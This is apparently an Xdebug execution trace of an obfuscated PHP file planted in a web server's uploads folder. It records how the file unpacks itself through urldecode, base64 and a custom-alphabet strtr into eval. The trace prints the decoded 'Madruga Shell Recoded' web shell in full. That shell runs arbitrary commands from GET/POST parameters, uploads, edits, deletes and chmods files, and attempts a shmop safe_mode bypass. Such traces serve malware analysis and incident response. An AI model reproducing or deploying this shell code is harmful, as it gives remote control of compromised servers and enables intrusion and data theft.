Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 22:26:41.105044]
1 0 1 0.000351 393520
1 3 0 0.000511 432384 {main} 1 /var/www/html/uploads/xtp.php 0 0
2 4 0 0.000529 432384 urldecode 0 /var/www/html/uploads/xtp.php 1 1 '%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64'
2 4 1 0.000554 432496
2 4 R 'fg6sbehpra4co_tnd'
1 A /var/www/html/uploads/xtp.php 1 $OOO000000 = 'fg6sbehpra4co_tnd'
1 A /var/www/html/uploads/xtp.php 1 $OOO0000O0 = 'base'
1 A /var/www/html/uploads/xtp.php 1 $OOO0000O0 .= '64_d'
1 A /var/www/html/uploads/xtp.php 1 $OOO0000O0 .= 'ecode'
1 A /var/www/html/uploads/xtp.php 1 $OOO000O00 = 'fopen'
1 A /var/www/html/uploads/xtp.php 1 $O0O000O00 = 'fget'
1 A /var/www/html/uploads/xtp.php 1 $O0O000O0O = 'fgetc'
1 A /var/www/html/uploads/xtp.php 1 $O0O000O00 = 'fgets'
1 A /var/www/html/uploads/xtp.php 1 $O0O00OO00 = 'fread'
1 A /var/www/html/uploads/xtp.php 1 $OOO00000O = 'strtr'
1 A /var/www/html/uploads/xtp.php 1 $OOO0O0O00 = '/var/www/html/uploads/xtp.php'
1 A /var/www/html/uploads/xtp.php 1 $OO00O0000 = 28736
2 5 0 0.000716 432664 base64_decode 0 /var/www/html/uploads/xtp.php 1 1 'JE8wMDBPME8wMD0kT09PMDAwTzAwKCRPT08wTzBPMDAsJ3JiJyk7JE8wTzAwT08wMCgkTzAwME8wTzAwLDB4NGY5KTskT08wME8wME8wPSRPT08wMDAwTzAoJE9PTzAwMDAwTygkTzBPMDBPTzAwKCRPMDAwTzBPMDAsMHgxN2MpLCdFbnRlcnlvdXdraFJIWUtOV09VVEFhQmJDY0RkRmZHZ0lpSmpMbE1tUHBRcVNzVnZYeFp6MDEyMzQ1Njc4OSsvPScsJ0FCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaYWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXowMTIzNDU2Nzg5Ky8nKSk7ZXZhbCgkT08wME8wME8wKTs='
2 5 1 0.000753 433144
2 5 R '$O000O0O00=$OOO000O00($OOO0O0O00,\'rb\');$O0O00OO00($O000O0O00,0x4f9);$OO00O00O0=$OOO0000O0($OOO00000O($O0O00OO00($O000O0O00,0x17c),\'EnteryouwkhRHYKNWOUTAaBbCcDdFfGgIiJjLlMmPpQqSsVvXxZz0123456789+/=\',\'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\'));eval($OO00O00O0);'
2 6 0 0.000802 435240 eval 1 '$O000O0O00=$OOO000O00($OOO0O0O00,\'rb\');$O0O00OO00($O000O0O00,0x4f9);$OO00O00O0=$OOO0000O0($OOO00000O($O0O00OO00($O000O0O00,0x17c),\'EnteryouwkhRHYKNWOUTAaBbCcDdFfGgIiJjLlMmPpQqSsVvXxZz0123456789+/=\',\'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\'));eval($OO00O00O0);' /var/www/html/uploads/xtp.php 1 0
3 7 0 0.000829 435240 fopen 0 /var/www/html/uploads/xtp.php(1) : eval()'d code 1 2 '/var/www/html/uploads/xtp.php' 'rb'
3 7 1 0.000853 435896
3 7 R resource(4) of type (stream)
2 A /var/www/html/uploads/xtp.php(1) : eval()'d code 1 $O000O0O00 = resource(4) of type (stream)
3 8 0 0.000884 435824 fread 0 /var/www/html/uploads/xtp.php(1) : eval()'d code 1 2 resource(4) of type (stream) 1273
3 8 1 0.000908 445616
3 8 R '\r\n\r\n\r\n\r\n\r\n\r\n Madruga Shell Recoded \r\n\r\n\r\n\r\nSEU MADRUGA Shell Recoded
\r\n\';\n@set_time_limit(0);\n$IIIIIIIIIIIl = $_SERVER[\'QUERY_STRING\'];\n$IIIIIIIIIII1 = \'shell?\';\n$IIIIIIIIIIlI = explode("$IIIIIIIIIII1",$IIIIIIIIIIIl);\n$IIIIIIIIIIl1 = $IIIIIIIIIIlI[0];\n$IIIIIIIIII1I = $_SERVER[\'PHP_SELF\']."?".$IIIIIIIIIIl1.$IIIIIIIIIII1;\n$IIIIIIIIII1l = @PHP_OS;\n$IIIIIIIIII11 = \'127.0.0.1\';\n$IIIIIIIIIlII = @php_uname();\n$IIIIIIIIIlIl = @phpversion();\n$IIIIIIIIIllI = @ini_get(\'safe_mode\');\nif ($IIIIIIIIIllI == \'\') {$IIIIIIIIIllI = "OFF";}\nelse {$IIIIIIIIIllI = "$IIIIIIIIIllI";}\n$IIIIIIIIIll1 = \'shell?\';\necho "";\nfunction cmd($IIIIIIIIIl1l) {\n$IIIIIIIIIl11[1] = \'\';\nexec($IIIIIIIIIl1l,$IIIIIIIIIl11[1]);\nif (empty($IIIIIIIIIl11[1])) {\n$IIIIIIIIIl11[1] = shell_exec($IIIIIIIIIl1l);\n}\nelseif (empty($IIIIIIIIIl11[1])) {\n$IIIIIIIIIl11[1] = passthru($IIIIIIIIIl1l);\n}\nelseif (empty($IIIIIIIIIl11[1])) {\n$IIIIIIIIIl11[1] = system($IIIIIIIIIl1l);\n}\nelseif (empty($IIIIIIIIIl11[1])) {\n$IIIIIIIII1ll = popen($IIIIIIIIIl1l,\'r\');\nwhile(!feof($IIIIIIIII1ll)) {\n$IIIIIIIIIl11[1][] .= fgets($IIIIIIIII1ll);\n}\npclose($IIIIIIIII1ll);\n}\nreturn $IIIIIIIIIl11[1];\n}\nif (@$_GET[\'chdir\']) {\n$chdir = $_GET[\'chdir\'];\n}else {\n$chdir = getcwd()."/";\n}\nif (@chdir("$chdir")) {\n$IIIIIIIIlII1 = " Directory Door, OK!";\n}else {\n$IIIIIIIIlII1 = "Error: Could not enter folder!";\n$chdir = str_replace($SCRIPT_NAME,"",$_SERVER[\'SCRIPT_NAME\']);\n}\n$chdir = str_replace(chr(92),chr(47),$chdir);\nif (@$_GET[\'action\'] == \'upload\') {\n$IIIIIIIIlIll = $chdir;\n$IIIIIIIIlIl1 = $IIIIIIIIlIll.$_FILES[\'userfile\'][\'name\'];\nif (@move_uploaded_file($_FILES[\'userfile\'][\'tmp_name\'],$IIIIIIIIlIll .\n$_FILES[\'userfile\'][\'name\'])) {\n$IIIIIIIIlII1 = "{$_FILES[\'userfile\'][\'name\']}, archieve valid, uploading complete. \r\n\r\n";\n}else {\n$IIIIIIIIlII1 = "Error: couldnt upload file on server.";\n}\n}\nelseif (@$_GET[\'action\'] == \'mkdir\') {\n$newdir = $_GET[\'newdir\'];\nif (@mkdir("$chdir"."$newdir")) {\n$IIIIIIIIlII1 = "{$newdir}, folder \r\nCreated. ";\n}else {\n$IIIIIIIIlII1 = "Error: Folder Make Error.";\n}\n}\nelseif (@$_GET[\'action\'] == \'newfile\') {\n$newfile = $_GET[\'newfile\'];\nif (@touch("$chdir"."$newfile")) {\n$IIIIIIIIlII1 = "{$newfile}, berhasil \r\n\r\ndibuat! ye ke? ";\n}else {\n$IIIIIIIIlII1 = "Error: Pembuatan arsip gagal! entah?";\n}\n}\nelseif (@$_GET[\'action\'] == \'del\') {\n$file = $_GET[\'file\'];$type = $_GET[\'type\'];\nif ($type == \'file\') {\nif (@unlink("$chdir"."$file")) {\n$IIIIIIIIlII1 = "{$file}, Berhasil \r\n\r\nmenghapus arsip (file)!";\n}else {\n$IIIIIIIIlII1 = "Error: Gagal menghapus arsip (file)!";\n}\n}elseif ($type == \'dir\') {\nif (@rmdir("$chdir"."$file")) {\n$IIIIIIIIlII1 = "{$file}, Berhasil \r\n\r\nmenghapus folder!";\n}else {\n$IIIIIIIIlII1 = "Error: Gagal menghapus folder!";\n}\n}\n}\nelseif (@$_GET[\'action\'] == \'chmod\') {\n$file = $chdir.$_GET[\'file\'];$chmod = $_GET[\'chmod\'];\nif (@chmod ("$file",$chmod)) {\n$IIIIIIIIlII1 = "Chmod dari {$_GET[\'file\']} berubah menjadi \r\n\r\n$chmod : Sukses!";\n}else {\n$IIIIIIIIlII1 = \'Error: Gagal mengubah chmod.\';\n}\n}\nelseif (@$_GET[\'action\'] == \'rename\') {\n$file = $_GET[\'file\'];$newname = $_GET[\'newname\'];\nif (@rename("$chdir"."$file","$chdir"."$newname")) {\n$IIIIIIIIlII1 = "Archive {$file} \r\n\r\nnamed for {$newname} successfully!";\n}else {\n$IIIIIIIIlII1 = "Error: Gagal mencalonkan arsip.";\n}\n}\nelseif (@$_GET[\'action\'] == \'copy\') {\n$file = $chdir.$_GET[\'file\'];$copy = $_GET[\'fcopy\'];\nif (@copy("$file","$copy")) {\n$IIIIIIIIlII1 = "{$file}, disalin \r\n\r\nmenjadi {$copy} \r\n\r\nBerhasil!";\n}else {\n$IIIIIIIIlII1 = "Error: Gagal menyalin {$file} menjadi {$copy}";\n}\n}\nelseif (@$_GET[\'action\'] == \'cmd\') {\nif (!empty($_GET[\'cmd\'])) {$cmd = @$_GET[\'cmd\'];}\nif (!empty($_POST[\'cmd\'])) {$cmd = @$_POST[\'cmd\'];}\n$cmd = stripslashes(trim($cmd));\n$IIIIIIIIl1ll = cmd($cmd);\n$IIIIIIIIl1l1 = count($IIIIIIIIl1ll);$IIIIIIIIl11l = 0;$IIIIIIIIlII1 = \'\';\n$IIIIIIIIlII1 .= "Hasil : ".$cmd."
";\nif ($IIIIIIIIl1ll) {\nwhile ($IIIIIIIIl11l <= $IIIIIIIIl1l1) {\n$IIIIIIIIlII1 .= " ".@$IIIIIIIIl1ll[$IIIIIIIIl11l]."
";\n$IIIIIIIIl11l++;\n}\n}\nelse {\n$IIIIIIIIlII1 .= "Error: comando nao aceito.
";\n}\n}\nelseif (@$_GET[\'action\'] == \'safemode\') {\nif (@!extension_loaded(\'shmop\')) {\necho "Loading... module";\nif (strtoupper(substr(PHP_OS,0,3) == \'WIN\')) {\n@dl(\'php_shmop.dll\');\n}else {\n@dl(\'shmop.so\');\n}\n}\nif (@extension_loaded(\'shmop\')) {\necho "Module: shmop loaded!";\n$IIIIIIII1II1 = @shmop_open(0xff2,"c",0644,100);\nif (!$IIIIIIII1II1) {echo "Couldn\'t create shared memory segment\\n";}\n$IIIIIIII1IlI="\\x00";\n$IIIIIIII1Ill=-3842685;\n$IIIIIIII1Il1 = @shmop_write($IIIIIIII1II1,$IIIIIIII1IlI,$IIIIIIII1Ill);\nif ($IIIIIIII1Il1 != strlen($IIIIIIII1IlI)) {echo "Couldn\'t write the entire length of \r\n\r\ndata\\n";}\nif (!shmop_delete($IIIIIIII1II1)) {echo "Couldn\'t mark shared memory block for deletion.";}\necho passthru("id");\nshmop_close($IIIIIIII1II1);\n}else {echo "Module: shmop tidak dimuat!";}\n}\nelseif (@$_GET[\'action\'] == \'zipen\') {\n$file = $_GET[\'file\'];\n$IIIIIIII1I11 = @zip_open("$chdir"."$file");\n$IIIIIIIIlII1 = \'\';\nif ($IIIIIIII1I11) {\nwhile ($IIIIIIII1lIl = zip_read($IIIIIIII1I11)) {\n$IIIIIIIIlII1 .= "Name: ".zip_entry_name($IIIIIIII1lIl) ."\\n";\n$IIIIIIIIlII1 .= "Actual Filesize: ".zip_entry_filesize($IIIIIIII1lIl) ."\\n";\n$IIIIIIIIlII1 .= "Compressed Size: ".zip_entry_compressedsize($IIIIIIII1lIl) ."\\n";\n$IIIIIIIIlII1 .= "Compression Method: ".zip_entry_compressionmethod($IIIIIIII1lIl) ."\\n";\nif (zip_entry_open($IIIIIIII1I11,$IIIIIIII1lIl,"r")) {\necho "File Contents:\\n";\n$IIIIIIII1l11 = zip_entry_read($IIIIIIII1lIl,zip_entry_filesize($IIIIIIII1lIl));\necho "$IIIIIIII1l11\\n";\nzip_entry_close($IIIIIIII1lIl);\n}\necho "\\n";\n}\nzip_close($IIIIIIII1I11);\n}\n}\nelseif (@$_GET[\'action\'] == \'edit\') {\n$file = $_GET[\'file\'];\n$IIIIIIII11lI = \'\';\n$IIIIIIII11ll = "$chdir"."$file";\n$IIIIIIII11lI = @file_get_contents($IIIIIIII11ll);\n$IIIIIIII11lI = htmlspecialchars($IIIIIIII11lI);\n$IIIIIIII111I = $_SERVER[\'HTTP_REFERER\'];\necho "Editing {$file} ...
";\necho "";\necho "";\necho "| ";\necho "";\necho " | ";\necho "
";\necho "
";\n}\nelseif (@$_GET[\'action\'] == \'save\') {\n$IIIIIIII11ll = "$chdir".$_GET[\'file\'];\n$IIIIIIII111l = $_POST[\'S1\'];\n$IIIIIIII111l = stripslashes(trim($IIIIIIII111l));\nif (is_writable($IIIIIIII11ll)) {\n@$IIIIIIIII1ll = fopen ($IIIIIIII11ll,"w");\n@$IIIIIIIlIIIl = fwrite($IIIIIIIII1ll,$IIIIIIII111l);\n@fclose($IIIIIIIII1ll);\nif ($IIIIIIIII1ll &&$IIIIIIIlIIIl) {\n$IIIIIIIIlII1 = "{$_GET[\'file\']}, berhasil diedit!";\n}\n}else {\n$IIIIIIIIlII1 = "{$_GET[\'file\']}, tidak \r\n\r\nbisa ditulisi!";\n}\n}\n$IIIIIIIlIIll = \'\';\nif (!empty($_GET[\'cmd\'])) {$IIIIIIIlIIll = @$_GET[\'cmd\'];}\nif (!empty($_POST[\'cmd\'])) {$IIIIIIIlIIll = @$_POST[\'cmd\'];}\n$IIIIIIIlIIll = htmlspecialchars($IIIIIIIlIIll);\nfunction IIIIIIIlIIl1() {\n$IIIIIIIlII1I = \'\';\nif (@file_exists("/usr/bin/wget")) {$IIIIIIIlII1I .= "wget ";}\nif (@file_exists("/usr/bin/fetch")) {$IIIIIIIlII1I .= "fetch ";}\nif (@file_exists("/usr/bin/curl")) {$IIIIIIIlII1I .= "curl ";}\nif (@file_exists("/usr/bin/GET")) {$IIIIIIIlII1I .= "GET ";}\nif (@file_exists("/usr/bin/lynx")) {$IIIIIIIlII1I .= "lynx ";}\nreturn $IIIIIIIlII1I;\n}\necho "";\necho "\r\n\r\n\r\n\r\n